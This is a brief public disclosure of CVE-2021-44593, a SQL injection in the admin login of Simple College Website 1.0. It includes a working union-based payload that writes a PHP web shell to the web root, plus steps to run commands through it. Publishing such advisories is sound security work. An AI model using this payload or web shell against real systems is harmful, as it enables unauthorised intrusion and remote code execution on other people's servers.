Public disclosure of CVE-2021-44593. A SQL injection/arbitrary file upload/remote code execution vulnerability in Simple College Website.
Simple College Website 1.0 is vulnerable to an unauthenticated union-based SQL injection in the "username" parameter of the /admin/login.php page, which can then be leveraged to upload arbitrary files & gain remote code execution.
The function login() in admin_class.php
- Access the admin login page (usually /admin/login.php)
- Submit the login form with the POST parameter "username" containing the following UNION-based SQL injection:
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
- Navigate to /testing.php?cmd=id
- Knowledge of the web server root directory location is needed.
- Knowledge of the document root directory location may also be needed if it is not the same as the web server root directory.
- Further, the MySQL daemon needs to have write permissions for said directory.